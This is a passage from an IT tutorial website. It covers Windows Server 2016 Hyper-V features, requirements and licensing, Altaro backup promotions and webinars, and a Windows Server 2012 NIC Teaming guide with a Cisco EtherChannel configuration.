  2. Set up a virtual machine on Altaro VM Backup and take a screenshot. Only screenshots that show at least 1 VM added for backing up will be considered as eligible.
  3. Upload the screenshot and the Grand Prize choice at the link you will receive via email once you download Altaro VM Backup from the contest landing page.

Good luck!

  • Hits: 7030

Free Webinar: Migrating from Hyper-V to VMware

hyper-v vmware migration webinarIf your organization is planning to migration from a Hyper-V virtualization environment to VMware then this FREE webinar is just for you.

Aimed toward Hyper-V and VMware admins this webinar will cover critical topics such as:

  • vSphere basics and a crash course in HA, DRS, and vMotion
  • Management differences between vSphere and Hyper-V
  • How to migrate VMs from Hyper-V to VMware using the VMware vSphere Converter

The entire session will be geared towards Hyper-V admins who are looking to broaden their horizons by adding VMware know-how to their toolbox.

Webinar Date: Tuesday, June 27th 2017 - Click here to join.

Time: Time for US attendees: (10am PDT / 1pm EDT), Time for EU attendees: (2pm CEST)

While the event date has passed, it has been recorded and is available for viewing. All material are available as direct downloads. Click here to access the event.

  • Hits: 13636

Guide to Windows Server 2016 Hyper-V Hypervisor: New Virtualization Features, Limitations, Backup, Checkpoints, Storage, Networking and more

Guide to Hyper-V Windows server 2016One of Windows Server 2016 highlights is the newer Hyper-V server that not only extends the hypervisor’s features and capabilities but also introduces a number of new enhancements and concepts that take virtualization to a new level.

There’s a lot of new exciting features we are covering so without any further delay, let’s take a look at what we have in hand for you:

Users new to Hyper-V can also read our Introduction to Hyper-V Concepts article

Hyper-V Hypervisor Technology Overview

Hyper-V was first released in 2008 as a re-brand of Microsoft’s Virtual PC. It lets users create a virtual machine (VM), a complete, software version of a computer. Users don’t have to install an OS through the normal route, and instead run a program on top of their current one.

This is made possible by a hypervisor – a layer between the physical and virtual environments that can manage the system’s hardware between VMs. It isolates the host machine from its underlying hardware.

This opens some natural benefits. Firstly, a virtual machine is in a separate environment to the host computer. As a result, any problems that occur do not affect the regular operating system. This makes virtual machines ideal testing environments.

This is furthered by the ability to run multiple operating systems at once. Most modern computers have more hardware than needed for day to day tasks, and users can run, for example, a Windows, Windows Server, and Linux operating system simultaneously. Instead of requiring three different servers, only one is required. This cuts down on hardware, power, maintenance, and cooling costs.

It also allows for more flexible deployment. At a hefty fee, admins can purchase a Windows Datacenter license and create infinite virtual machines without having to pay any extra. In testing or production environments, this cuts out vital slowdown while employees check licenses. With virtualization, new servers can be deployed in minutes.

Another flexibility is hardware resources. Users can configure Hyper-V to utilize different amounts of resources, including the processor, storage, and memory. This is particularly useful if an organization uses a Virtual Desktop Infrastructure (VDI). A Windows operating system is hosted on a central server, and users are given virtual desktops over the network. Not only does this save on licensing costs, it means admins can scale the amount of resources users have depending on various factors.

Hyper-V also lets admins make easy backups. It’s simple to copy a VM and restore it later if anything goes wrong. With Hyper-V, there are two options – saved states, and Volume Shadow Copy Service (VSS). VSS lets admins make backups even when files are in use, meaning the process can be completed on demand.

This ease of movement can be useful in other scenarios. Built-in features like live and storage migration make virtual machines much more portable. Users can access the exact same environment on a different machine, without the need for complex procedures. That combines with security features like Secure Boot to protect the host OS from viruses, malware, and attacks.

Hyper-V Backup

Hyper-V in Windows Server 2016

One of the most popular hosts for a virtual machine is Microsoft’s Windows Server OS. For the past few years, admins have been running Windows Server 2012 R2, a Windows 8.1-based platform. However, the release of Windows 10 has prompted a Windows Server 2016 variant, and it comes with plenty of new functionality.

A big example is the introduction of Microsoft’s Nano Server. A purpose-built OS, Nano Server is a lightweight version of Windows Server Core that’s designed to run born-in-the-cloud applications and containers. It’s complementary to Windows Server 2016, has no GUI, and is optimized for Hyper-V. The service provides an environment with a low overhead and fewer avenues of attack.

Windows Server 2016 also introduces nested virtualization. Essentially, this lets you run a VM inside another VM. Though it’s a strange concept, the usage scenarios are more common than you may think. Many companies now use the virtual infrastructure we mentioned earlier, and this means those systems can still use Hyper-V. It also makes for a good test environment, letting trainees try out different Oss and situations without the need for separate hardware.

Other big improvements come to the Hyper-V manager. An updated WS-MAN management protocol lets admins do a live migration without having to enable extra settings in Azure Active Directory. This also enables CredSSP, Kerbos or NTLM authentication, and makes it easy to enable a host for remote management.

This is furthered by support for alternate credentials when connecting to another Windows 10 or 2016 remote host. This includes a save functionality so that you don’t have to type it every time. Though earlier versions don’t support this functionality, you can still use the Hyper-V manager in Windows Server 2016 to control earlier versions. The new manager supports Windows Server 2012, 2012 R2, Windows 8, and 8.1.

The next major change is PowerShell Direct. The process runs between the host and virtual machine, meaning there’s less need to configure firewalls and networks. It lets users remotely run cmdlets in multiple VMs without complex setup. PowerShell functionality extends to NanoServers, where it can run directly.

Hyper-V Containers

It’s no secret that containers are on the rise, and are becoming increasingly common in production scenarios. With Windows Server 2016, Microsoft has introduced Windows and Hyper-V Containers for the first time.

For those unfamiliar, containers let users create an isolated environment in which to run an application. The environment lets an app run without affecting the rest of the system, and vice versa. In comparison to a VM, they’re more lightweight and don’t emulate hardware in the same way.

hyper-v containers

Traditionally, containers were limited to Linux Oss. Through a collaboration with Docker, Windows Server 2016 now offers two type of containers.

  • A Windows Server Container uses namespace and isolation technology, but shares a kernel with the container host and all other running containers.
  • A Hyper-V container instead runs each container in an optimized VM. In this case, the kernel isn’t shared with the host, or other containers.

Windows Containers have several important features, including HTTPS support, data management through container shared folders, and the ability to restrict container resources.

Hyper-V Security Features

Hyper-V on Windows Server 2016 also comes with new security features. The first is the ability to use Secure Boot with Linux VMs. This feature was previously restricted to Windows 8 and Server 2012, and checks the signature of boot software on launch to prevent malware and unauthorized OSs launching during start up.

Host resource protection also has some security and stability improvements. It stops VMs from hogging system resources by monitoring activity and downgrading VMs with excessive usage. It can be enabled through PowerShell and prevents performance degradation with the host or other machines.

Shielded virtual machines provide further protection. In essence, they provide a stronger barrier against spying by administrators and malware. Encryption is applied to the state and data, meaning admins can’t see the activities or intercept information. This combines with further encryption options for operating system disks on generation 1 virtual machines. Users can utilize BitLocker to do this, creating a small drive that contains the encryption key. To start the machine, hosts need either access to the private key or to be part of an authorized guarded fabric.

Generation 2 Virtual Machines, Performance and Features

Generation 2 VMs have some new features, too. Namely, they can use a lot more memory and virtual processors. Gen 2 supports up to 12 TB of virtual memory versus the previous 1 TB, and up to 24 TB per physical host server. It also supports 240 Virtual Processors instead of 64, and 512 logical processors rather than 320.

The result is a huge increase in performance, suitable for large-scale online transaction processing and data warehousing. Microsoft benchmarks reveal up to 343,000 transactions per second with a 4 TB in-memory database and 128 virtual processors. That’s 95% of a physical server’s performance.

hyper-v gen2 vm hardware

Figure 2. Physical server vs. Hyper-V performance

Generation 2 VMs also offer new, virtualization-based security. Microsoft’s Device Guard and Credential Guard offers protection against malware and operating systems in guest VMs that are version 8 or higher.

Further functionality comes with the ability to hot add and remove network adapters and memory. In simple terms, this lets users add or remove network adapters while a machine is still running. While that feature is exclusive to Gen 2, both generations can now adjust the amount of memory utilised on-the-fly, even with the “dynamic memory” option disabled.

Backups and Checkpoints

Though Hyper-V offers significantly easier backups, the VSS system can be a little unreliable. In 2016, Microsoft has built change tracking into Hyper-V, which makes it easier for third-party software vendors to create backup solutions.

However, a backup system isn’t much use if you have faulty checkpoints and snapshots. In Windows Server 2012, snapshots could cause serious problems in a production environment. Restoring a VM from a snapshot could put the database server out of sync, creating problems down the line.

Thankfully, this is remedied in Windows Server 2016. It introduces “production checkpoints”, which complies with support policies. The new checkpoints use VSS rather than saved states, greatly reducing the risks. The feature is enabled by default in Hyper-V.

Rolling Cluster Upgrades

An efficient, reliable upgrade system is equally important. Microsoft has made upgrading from 2012 R2 to 2016 far easier than previous versions. Rather than requiring a separate cluster to start the migration process, 2016 introduces rolling cluster upgrades.

hyper-v cluster upgrade path

This lets admins upgrade a cluster without any downtime. Clusters run at the feature level of 2012 R2 until all the nodes are upgraded, at which point the user can either reverse it or enable the 2016 features with a PowerShell cmdlet.

Networking

Further functionality is introduced to Hyper-V networking. Microsoft has enabled Remote direct memory access for switch embedded teaming (SET). This lets admins group up to eight network adapters into a single virtual one, whilst still able to use RMDA. For those unfamiliar, RDMA allows you to read and write memory without the use of a remote CPU, leading to less CPU utilization and latency.

Another new feature is Virtual machine multi queues, or VMMQ. This builds on the previous VMQ by allowing multiple hardware queues for each VM. Thus, default queues are actually a set, with traffic spread between them.

Storage

Windows Server 2016 also makes changes to storage options for a more manageable experience. Shared virtual hard disks can now be resized while the machine is still online. New functionality also extends to guest clusters, which can protect virtual hard disks with Hyper-V replica.

Microsoft has updated its storage Quality of Service policies. QoS lets admins manage and monitor storage performance using scale-out file server roles. Windows Server 2016 makes several tweaks to that system.

Storage QoS now makes sure a VM can’t take all the storage resources, cutting out other machines’ options. This combines with the ability to define performance minimums and maximums for individual VMs, providing a more reliable experience.

Finally, the storage of virtual machines can be monitored as soon as they start. These details are all viewable from a new, single location.

There are other options available for those struggling with storage space. Data Deduplication searches for redundant data by looking for duplicate files. The data is then sorted and compressed, optimizing the drive without compromising data integrity. Further improvements come in the form of a new VM configuration format. Vmcx files make data reading and writing more efficient, and lessen the chance of corruptions.

Miscellaneous Hyper-V Improvements

Though Windows Server 2016 introduces some major improvements, there are also smaller ones that are very interesting. One is the ability to connect PCIe hardware directly to a VM. Microsoft calls it Discrete Device Assignment and currently supports NVMe storage, allowing for fast SSD speeds.

However, more exciting is the future of PCIe in Windows Server. Microsoft is working with GPU vendors to add support for specific GPUs, which could be useful for graphic intensive programs like rendering software and Photoshop.

There’s also a minor but important feature for Always On computers. A Connected Standby power state is now available, even with the Hyper-V role installed. Connected Standby is available with select CPUs, and lets the PC listen for notifications in a similar way to phones. If a message appears, the screen will light up, notifying the user.

Hyper-V System Requirements on Windows Server 2016

Naturally, some of these new features come with hardware requirements. Though those prerequisites haven’t changed dramatically since 2012 R2, Hyper-V still won’t work with every system. This is especially true if you want to utilize new features such as shielded VM and discrete device assignment.

General Requirements

First off, the general Hyper-V requirements. You’ll need the following specifications as a base, regardless of any extra features you want:

  • A processor that’s 64-bit and supports Second-Level Address Translation (SLAT). This is required for virtualization, but not for Hyper-V management tools.
  • At least 4 GB of RAM, preferably more, and higher amounts for multiple VMs.
  • VM Monitor Mode extensions
  • Virtualization turned on in BIOS of UEFI, including hardware-assisted virtualization and hardware-enforced Data Execution prevention (DEP).

There are several ways to tell if you meet these requirements, but the easiest is through command prompt or PowerShell. You can follow these steps:

  1. Press Windows + R
  2. Type cmd.exe (powershell.exe alternatively)
  3. In the command line, enter Systeminfo.exe and press Enter
  4. View your report under Hyper-V Requirements

hyper-v-requirements via cmd or powershell prompt

Hyper-V Shielded Virtual Machines

As mentioned earlier, Shielded Virtual Machines have further requirements. The host needs the following:

  • UEFI 2.3.1c for secure and measured booting
  • TMP v2.0 if you want platform security asset protection
  • IOMMU (Intel VT – D) for direct memory access protection

 

vm-shielded-hyper-v-2016

In addition, VMs need to be Generation 2, and the guest operating system must be Windows Server 2016, 2012 R2, or 2012.

Discrete Device Management

The feature with the most requirements is Discrete Device Management. Hosts need supported processors, chipsets and firmware table, as follows:

  • Processor: Support for Intel Extended Page Table (EPT) or AMD Nested Page Table (NPT)
  • Chipset: Interrupt Remapping support, either Intel VT-d2, or AMD I/O memory management. It must also support DMA remapping and Access control services for PCI-e root ports.
  • Firmware tables: I/O MMU exposure to the Windows hypervisor is a must, and needs to be enabled in UEFI or BIOS.

Hyper-V Supported Guest Operating Systems

The availability of guest operating systems also varies slightly with Windows Server 2016. While Windows Server has the best virtual processor support, other systems still provide great functionality. Here’s the full list of Windows guest operating systems and their differences:

  • Windows Server 2016: 240 virtual processors (gen 2), 64 (gen 1)
  • Windows Server 2012 R2: 64 virtual processors
  • Windows Server 2012: 64 virtual processors
  • Windows Server 2008 R2 with SP 1: 64 virtual processors
  • Windows Server 2008 with SP 2: 4 virtual processors
  • Windows Small Business Server 2011: 4 virtual processors (standard edition) 2 (essentials edition)
  • Windows 10: 32 virtual processors
  • Windows 8.1: 32 virtual processors
  • Windows 7 with SP 1: 4 virtual processors (must be Professional, Enterprise, or Ultimate)
  • Windows Vista with Service Pack 2 (SP2): 2 virtual processors (must be Business, Enterprise, or Ultimate)

Guest OSs also vary in the support for Integration Services. In general, Windows 8.1 (Windows Server 2012) or higher has Integration Services built-in. Other versions usually require an upgrade or install after the guest operating system is set up.

Hyper-V Linux Support

Hyper-V support for Linux is a little more complex. Microsoft provides both emulated and Hyper-V specific devices, but the performance and features of emulated devices is limited. As a result, the software giant recommends using Hyper-V specific devices for Linux, alongside its Linux Integration Services (LIS) drivers.

LIS is integrated into the Linux kernel and is regularly updated, but this may not extend to users on older distributions. Thus, some users must download LIS manually.

That said, support for Linux in Windows Server 2016 is good, and builds on previous versions. Microsoft has LIS support for the following distributions:

CentOS

  • RHEL/CentOS 7.x, 64-bit
  • RHEL/CentOS 6.x, 64-bit (No built-in LIS for 6.0-6.3)
  • RHEL/CentOS 5.x, 32-bit (No built-in LIS before 5.9

It’s worth noting that CentOS has some feature limitations, though these can vary depending on version. There are issues with StaticIP injection across the board when Network Manager is configured for a synthetic network adapter. In addition, VLAN trunking only works in 7.x, PCI pass through and SR-IOV only work on 7.3 and higher. Live virtual machine backups aren’t possible in 5.2, 5.3, or 5.4.

Debian

  • Jessie [8.0-8.5]
  • Wheezy [7.0-7.11]

Debian also has some restrictions. The main one is the inability to create file systems on VHD’s larger than 2TB. There are live virtual machine backup problems here too, not working with ext2 filesystems.

Oracle

  • Red Hat (No built-in LIS for 6.0-6.3)
    • 6.x - 32-bit, 32-bit PAE, 64-bit
    • 7.x - 64-bit
  • Unbreakable Enterprise Kernel

With RedHat, VLAN trunking only works on versions 7.0-7.2. It also has issues with virtual fibre channels, where the machine may not be able to mount correctly if LUN 0 has not been populated. Both RedHat and UEK may have to undergo a filesystem check if there are open file handles during backup and may fail silently if there is an iSCSI or pass-through disk attached.

SUSE

  • SLES SP2
  • SLES SP1 – 64-bit only
  • SLES 12 – 64-bit only
  • SLES 11 SP4
  • SLES 11 SP3
  • SLES 11 SP2
  • Open SUSE 12.3

SUSE has the same Static IP injection limitations as CentOS, so Network Manager must be turned off or configured correctly. Similarly, live backup issues mirror that of Oracle VMs. Finally, Windows Server 2016 users must type memory parameters in multiples of 128 MB or there will be Hot-Add failures and lack of a memory increase.

Ubuntu

  • 16.10
  • 16.04
  • 14.04
  • 12.04

Ubuntu suffers from some of the limitations mentioned earlier. Specifically, there are static IP injection problems with Network Manager, virtual fibre channel issues if LUN 0 isn’t populated (except for 12.04), and similar problems with live backups in 14.04+.

It’s worth noting that most of these problems can be solved by proper configuration. It’s worth checking the TechNet documentation for a full list of issues and solutions for each version. Microsoft also has some best practices for running Linux on Hyper-V.

Hyper-V Scalability

Other than OS and feature support, Hyper-V varies in its scalability. While we have mentioned some of the virtual hardware increases in Gen 2 VMs, there are other factors to consider too. Here are the maximum numbers for each virtual machine component:

  • Checkpoints: 50
  • Memory: 12 TB for Gen 2, 1 TB for Gen 1
  • Serial ports: 2
  • Virtual Fibre Channel adapters: 4
  • Virtual Floppy devices: 1
  • Virtual hard disk capacity: 64 TB VHDX, 2040 GB VHD
  • Virtual IDE disks: 4
  • Virtual processors: 240 for Gen 2, 64 for Gen 1, 320 for host OS
  • Virtual SCSI controllers: 4
  • Virtual SCSI disks: 256
  • Virtual network adapters: 12 (8 Hyper-V specific, 4 legacy)

There are also some limitations for each Hyper-V host, though many components are uncapped:

  • Logical processors: 512 (320 for host OS partition)
  • Memory: 24 TB
  • Virtual machines per server: 1024
  • Virtual processors per server: 2048

Finally, Hyper-V has some Failover Clustering maximums. There’s a maximum of 64 nodes per cluster, so admins need to be aware of that when planning. There’s also an 8,000 per cluster limit for running virtual machines. However, this can vary significantly depending on the use of physical memory by each VM, number of disk spindles, and networking and storage bandwidth.

Summary

Windows Server 2016 takes many of the traditional advantages of virtualization and extends them. With its latest release, Microsoft has managed to provide major increases in performance, security, and management without complex system requirements or lack of OS support.

The Redmond giant’s latest server OS brings huge improvements in the form of Nano Servers, Containers, Shielded VMs, and hardware virtualization. The result is an undeniably better operating system for hosting Hyper-V machines.

However, there are still some possible issues admins should be aware of. Windows Server 2016 collects telemetry data by default, and there’s no option to turn it off entirely. It consists of security information, basic device information, how apps are used, and more. Naturally, all this data is anonymised and is used to create significant improvements. Still, some users may not be happy with this change from 2012 R2.

Microsoft is moving to a different update model with 2016, which can be positive in some cases but negative in others. The company rolls out two updates per month, one with security fixes and another with quality fixes. Each falls on a different day of the month.

On the plus side, this removes the issue of security updates being unnecessary once the quality update rolls out. The annoyance comes from the automatic updates and restarts that are enabled by default. Naturally, admins don’t want their server restarting without their express permission, and it’s not uncommon for updates to cause an issue with certain applications. Though this can be configured in 2016, it’s not as simple as previous versions.

Despite this, Windows Server 2016 remains a huge step forward for Hyper-V virtualization. It introduces some great new virtualization features, and its fleshed out free version makes it a natural choice for small businesses.

  • Hits: 27773

Windows Server 2016 VM Backup with Altaro's New VM Backup with Augmented Inline Deduplication

Windows Server 2016 VM Hyper-V & VMware Backup RestoreAltaro has released Altaro VM Backup, a faster and lighter upgrade to its flagship Hyper-V and VMware backup solution, which now supports all Windows Server editions and includes several highly-requested features including unique Augmented Inline Deduplication technology and boot from backup.

Altaro’s unique Augmented Inline Deduplication delivers faster backups and restores on local and offsite locations by making sure that only new data is transferred to the backup or offsite location. This augmented inline deduplication technology solves a common problem found in conventional backup solutions which deduplicates data after the transfer process. With Altaro VM Backup, that process happens before the data is transferred. This process not only provides quicker backups, but it also reduces the amount of storage needed to store said backups significantly more than any other solution on the market today.

"VM Backup is an important milestone at Altaro” said David Vella, CEO of Altaro. "Not only does it fully support all Windows Servers, our new and unique Augmented Inline Deduplication technology offers our customers the best storage savings in the industry"

Boot from Backup is another innovation in Altaro VM Backup that enables users to instantly boot any VM version from the backup location without affecting integrity of the backup. If disaster strikes, the VM can be booted up instantly from the backup drive with minimal downtime, while the VM is restored back to the Hypervisor in the background. A simple VM reboot completes the recovery process and preserves any changes done while the VM was booted.

For more information about Altaro VM Backup, visit altaro.com/vm-backup

  • Hits: 9923

Windows Server 2016 Licensing Made Easy – Understand Your Licensing Requirements & Different Server Editions

Windows Server 2016 LicensingThis article describes the new Windows Server 2016 Licensing model (per-core licensing) Microsoft has implemented for its new server-based operating system. While the Windows Server 2012 Licensing model was fairly straight forward: per CPU Pair + CALS/DAL for Standard and Datacenter editions, Microsoft has decided to change its licensing arrangements thanks to the continuously increasing number of available cores per physical processor which has caused significant losses to its profits.

Taking into consideration that the Intel Xeon E7-8890v4 contains a total of 24 cores capable of supporting up to 48 threads, one can quickly understand the software giant’s intention and why it is no longer continuing the per CPU Pair model for its Standard and Datacenter server editions.

Windows Server 2016 License Models

The Windows Server 2016 licensing model consists of per-core/processor + Client Access Licenses (CALs). Each user or device accessing a Windows Server Standard, Datacenter or Multipoint edition requires a Windows CAL or a Windows Server and a Remote Desktop Services (RDS) CAL.

In addition to these changes many would be surprised to know that there is now a minimum number of Per-Core licenses required per physical CPU and Server:

  • A minimum of 8 core licenses is required for each physical CPU.
  • A minimum of 16 core licenses is required for each server.
  • A 2-core license pack is the minimum amount of core licenses you can purchase. E.g you’ll need four 2-core license packs (4x2) to fully license an 8-core CPU.
  • The 2-core license is priced at 1/8 (one eighth) the price of a 2-CPU license for corresponding Windows 2012 R2 editions in order to keep the pricing similar. This means the pricing of a 16-core Windows 2016 Datacenter server is equal to a 2-CPU Windows 2012 R2 Datacenter server.

How Licensing Changes Affect Small Windows Server Deployments

Thankfully not much. Microsoft has adjusted its per-Core license pricing in such a way so that a small deployment of up to 16-cores per physical server will be the same pricing as a Windows server 2012 2-CPU License.

Running Windows or Linux Server under ESX or Hyper-V? Get an award-winning backup solution for Free! Download Now!

The price difference becomes apparent for larger customers with a server deployed that exceeds 8-cores per CPU and 16-cores per server. These customers will end up paying additional money for their licenses. For example a server with 2 x Intel Xeon E7-8890v4 CPUs means a total of 48 cores. Installing a Windows server 2012 Standard server means that the initial license will cover up to 16 out of the 48 cores and the customer will need to purchase additional licenses to cover the 32 extra cores! It’s now clear why big customers are going to be paying the big bucks!

The following table explains where additional licenses are required depending on the number of CPUs (processors) and cores per CPU. Remember - Minimum 8 cores/processor; 16 cores/server:

Windows Server 2016 Licensing: Calculating Licensing needs per CPU & Core

Figure 1. Windows Server 2016 Licensing: Calculating Licensing needs per CPU & Core

Windows Server 2016 Editions Overview, Licensing Models & CAL Requirements

Microsoft offers its Windows Server 2016 in 6 different editions. Let’s take a look at them and explain their primary role and usage:

Windows Server 2016 Datacenter: This edition targets highly virtualized datacenter and cloud environments. Main characteristics include its support for unlimited Hyper-V containers or Operating System Environments (OSEs or virtual machines). It also supports an unlimited number of Windows Server containers and boasts features such Host Guardian Service, Storage Spaces Direct and Storage Replica, Shielded Virtual Machines (VMs), Networking stack and more.

Windows Server 2016 Standard: Used for physical servers or environments with minimal virtualized requirements. This edition supports two Hyper-V containers or Operating System Environments (OSEs or virtual machines) alongside the Host Guardian Service.

The Host Guardian Service is a server role introduced in Windows Server 2016 and found on Windows Datacenter and Standard edition. It serves as a critical security component in protecting the transport key, and works in conjunction with other Windows Server 2016 components to ensure high security levels for Shielded VMs.

Host Guardian Service helps ensure high security levels for Shielded VMs

Figure 2. Host Guardian Service helps ensure high security levels for Shielded VMs

Windows Server 2016 Essentials: Ideal for small businesses with no more than 25-30 users and 50 devices. This edition is also a great replacement for businesses running Windows Server 2012 Foundation as the same edition is not available for Windows Server 2016.

Windows Server 2016 MultiPoint Premium Server: Allows multiple users to share a single computer while having their own applications and Windows experience and is suitable for academic environments.

Windows Storage Server 2016: Suitable for dedicated storage solutions. It’s available in Standard and Workgroup editions and mainly used by OEM manufactureres.

Microsoft Hyper-V Server 2016: The well-known Free Hypervisor which you can download. This is a stand-alone product that runs directly on the bare-metal server and is built using the same technology as the Hyper-V role on a Windows Server 2016.

Readers can also download here the Free Microsoft Windows Server 2012/2016 Licensing Datasheet that provides additional useful information.

The table below shows the licensing model adopted by each Windows Server 2016 edition:

Editions

Licensing Model

CAL Requirements

Windows Server 2016 Datacenter

Core-based

Windows Server CAL

Windows Server 2016 Standard

Core-based

Windows Server CAL

Windows Server 2016 Essentials

Processor-based

No CAL Required

Windows Server 2016 MultiPoint Premium

Processor-based

Windows Server CAL + Remote Desktop Services CAL

Windows Storage Server 2016

Processor-based

No CAL Required

Hyper-V Server 2016

N/A

N/A

 

 

 

 

 

 

 Table 1. Windows Server 2016 Editions and Licensing Models

Summary

With Windows Server 2016 out it’s only a matter of time before organizations begin to upgrade their servers and use it for new rollouts. Understanding the Windows Server 2016 Licensing model and server editions is critical to ensuring the right choices are made based on the organization’s requirements and server hardware availability. The new Windows Server core-based licensing can be slightly tricky so make sure you know your hardware and license theory well!

  • Hits: 29978

Windows 2016 Server Licensing Explained – Free Webinar

Windows Server 2016 LicensingWith Windows 2016 Server already making its way into data centers Windows 2016 Server Licensing is becoming a very hot topic. Windows 2016 Server is jam-packed with a number of advanced features including added layer of security, new deployment options, built-in Hyper-V containers, advanced networking options and cloud-ready services.

Check out our "Windows Server 2016 Licensing Made Easy – Understand Your Licensing Requirements & Different Server Editions" article

Altaro software, a reputable software vendor offering robust Virtualization Backup for Hyper-V & VMware,is hosting a free Webinar on Tuesday the 29th of November 2016 that will cover the following important topics:

  • Licensing a Windows 2016 Server environment
  • Nested Hypervisors and containers in Windows 2016 Server
  • Understanding Licensing complexity

While this event has passed, it is still available as a recorded session alongside with all material available as a free download. There is also a bonus Windows 2016 Server Licensing eBook available for free! Click here to access all resources!

 

  • Hits: 12137

Windows Server 2016 – Hyper-V Virtualization Update

windows-server-2016-new-hyper-v-virtualization-features-1The new Hyper-V virtualization features offered by Windows Server 2016 are planning to make major changes in the virtualization market. From Nested Hyper-V, revolutionary security, new management options to service availability, storage and more.

Learn all about the new hot virtualization features offered by Windows Server 2016 by attending the free webinar hosted by Altaro and presented by two Microsoft Cloud and Datacenter Managerment MVP’s Andy Syrewicze and Aidan Finn.

To learn more about the free webinar and register click here.

Note: While this webinar's date has passed, a complete recording is available, at the above url, alongside with all free downloadable material presented.

 

  • Hits: 12391

Windows 2012 Server NIC Teaming – Load Balancing/Failover (LBFO) and Cisco Catalyst EtherChannel LACP Configuration & Verification

NIC Teaming, also known as Windows Load Balancing or Failover (LBFO), is an extremely useful feature supported by Windows Server 2012 that allows the aggregation of multiple network interface cards to one or more virtual network adapters. This enables us to combine the bandwidth of every physical network card into the virtual network adapter, creating a single large network connection from the server to the network. Apart from the increased bandwidth, NIC Teaming offers additional advantages such as: Load balancing, redundant links to our network and failover capabilities.

Running Windows or Linux Server under ESX or Hyper-V? Get an award-winning backup solution for Free! Download Now!

Windows Hyper-V is also capable of taking advantage of NIC Teaming, which further increases the reliability of our virtualization infrastructure and the bandwidth available to our VMs.

windows-server-nic-teaming-load-balancing-failover-lacp-1

Figure 1. Windows 2012 Server – Hyper-V NIC Teaming with Cisco Catalyst Switch

There are two basic NIC Teaming configurations: switch-independent teaming & switch-dependent teaming. Let’s take a look at each configuration and its advantages.

Switch-Independent Teaming

Switch-independent teaming offers the advantage of not requiring the switch to participate in the NIC Teaming process. Network cards from the server can connect to different switches within our network.

Switch-independent teaming is preferred when bandwidth isn’t an issue and we are mostly interested in creating a fault tolerant connection by placing a team member into standby mode so that when one network adapter or link fails, the standby network adapter automatically takes over. When a failed network adapter returns to its normal operating mode, the standby member will return to its standby status.

Switch-dependent teaming requires the switch to participate in the teaming process, during which Windows Server 2012 negotiates with the switch creating one virtual link that aggregates all physical network adapters’ bandwidth. For example, a server with four 1Gbps network cards can be configured to create a single 4Gbps connection to the network.

Switch-dependent teaming supports two different modes: Generic or Static Teaming (IEEE 802.3ad) and Link Aggregation Control Protocol Teaming (IEEE 802.1ax, LACP). LACP is the default mode in which Windows NIC Teaming always operates.

Load Balancing Mode - Load Distribution Algorithms

Load distribution algorithms are used to distribute outbound traffic amongst all available physical links, avoiding bottlenecks while at the same time utilizing all links. When configuring NIC Teaming in Windows Server 2012, we are required to select the required Load Balancing Mode that makes use of one of the following load distribution algorithms:

Hyper-V Switch Port: Used primarily when configuring NIC Teaming within a Hyper-V virtualized environment. When Virtual Machine Queues (VMQs) are used a queue can be placed on the specific network adapter where the traffic is expected to arrive thus providing greater flexibility in virtual environments.

Address Hashing: This algorithm creates a hash based on one of the characteristics listed below and then assigns it to available network adapters to efficiently load balance traffic:

  • Source and Destination TCP ports plus Source and Destination IP addresses
  • Source and Destination IP addresses only
  • Source and Destination MAC addresses only
    • Distributes outgoing traffic based on a hash of the TCP Ports and IP addresses with real-time rebalancing allowing flows to move backward and forward between networks adapters that are part of the same group.
    • Inbound traffic is distributed similar to the Hyper-V port algorithm

Dynamic: The Dynamic algorithm combines the best aspects of the two previous algorithms to create an effective load balancing mechanism. Here’s what it does:

The Dynamic algorithm is the preferred Load Balancing Mode for Windows 2012 and the one we are covering in this article.

Click here for more teachnical articles covering Windows Server

Configuring NIC Teaming in Windows Server 2012

In this example, we’ll be teaming two 100Mbps network adapters on our server. Both network adapters are connected to the same switch and configured with an IP address within the same subnet 192.168.10.0/24.

To begin, open Server Manager and locate the NIC Teaming section under Local Server:

Locating NIC Teaming section in Server Manager Windows 2012 Server

Figure 2. Locating NIC Teaming section in Server Manager Windows 2012 Server

The lower right section of the NIC Teaming window displays the available network adapters that can be assigned to a new team. In our case these are two 100Mbps Ethernet adapters.

From the TEAM area, select Tasks and then New Team from the dropdown menu to create a new NIC Team:

Creating a new NIC Team in Windows Server 2012 Figure 3. Creating a new NIC Team in Windows Server 2012

At the NIC Teaming window select the adapters to be part of the new NIC Team. Ensure Teaming mode is set to the desired mode (LACP in our case) and Load balancing mode is set to Dynamic. The Standby Adapter option will be available when more than two network adapters are available for teaming. Optionally we can give the new NIC Team a unique name or leave it as is.

Finally, we can select the default VLAN under the Primary Team Interface option (not shown below). When ready, click on OK to save the configuration and create the NIC Team:

Configuring Teaming Mode, Load Balancing Mode and NIC Team members Figure 4. Configuring Teaming Mode, Load Balancing Mode and NIC Team members

Notice how the State of each network adapter is reported as Active – this indicates the adapter is correctly functioning as a member of the NIC Team.

When the new NIC Team window disappears we are brought back to the NIC Teaming window where Windows Server 2012 reports the NIC Teams currently configured, speed, status, Teaming Mode and Load Balancing mode:

Viewing NIC Teams, their status, speed, Teaming mode, Load balancing mode and more Figure 5. Viewing NIC Teams, their status, speed, Teaming mode, Load balancing mode and more

As mentioned earlier, NIC Teaming creates a virtual adapter that combines the speed of all network adapters that are part of the NIC Team. As we can see below, Windows Server has created a 200Mbps network adapter named Team-1:

The newly created NIC Team Adapter in Windows 2012 Server Figure 6. The newly created NIC Team Adapter in Windows 2012 Server

We should note that the MAC address used by the virtual adapter will usually be the MAC address from either physical network adapters.

Free Virtualization Backup with Award Winning Altaro Backup - Free Download Now!

Cisco Catalyst Switch Configuration

Depending on the type of NIC Teaming selected, the switch attached to the server might need to be configured. Cisco Catalyst switches fully support NIC Teaming and other types of link aggregation technologies through the use of EtherChannel. Cisco Catalyst provides support of the Link Aggregation Control Protocol (LACP) which also happens to be the default aggregation protocol when configuring EtherChannel.

More Information on Cisco Switches and configuration articles can be found in our dedicated Cisco Switches section

Create the Etherchannel interface by dedicating an equal number of switch ports to that of the physical network adapters participating in the NIC Teaming. In our example, we’ve got two network adapters so we’ll be using two switch ports.

Configure both switch ports to be part of Channel-Group 1 and set it to active mode. The Port-Channel interface will be configured in Trunk mode for our example:

interface Port-channel1
switchport mode trunk
switchport trunk native vlan 20
!
interface FastEthernet1/0/1
switchport mode trunk
channel-group 1 mode active
switchport trunk native vlan 20
!
interface FastEthernet1/0/2
switchport mode trunk
channel-group 1 mode active
switchport trunk native vlan 20

